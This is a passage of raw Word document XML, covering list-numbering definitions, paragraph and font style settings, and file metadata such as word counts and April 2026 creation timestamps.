  <w:num w:numId="24" w16cid:durableId="1679888021">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="96684850">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1455446947">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1456869595">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="218135067">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1435633489">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1300501250">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="626744115">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="479883198">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="2059166053">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="642849632">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1958443595">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1893957518">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1785923429">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="2356274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63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4563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EF35"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B7CDC9A2-16BB-4384-9E28-3EB1507E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2"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Apto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63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63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63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63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63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B4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63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B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63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B4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2933</Words>
  <Characters>16722</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>139</Lines>
  <Paragraphs>39</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>19616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2026-04-05T15:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-05T15:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>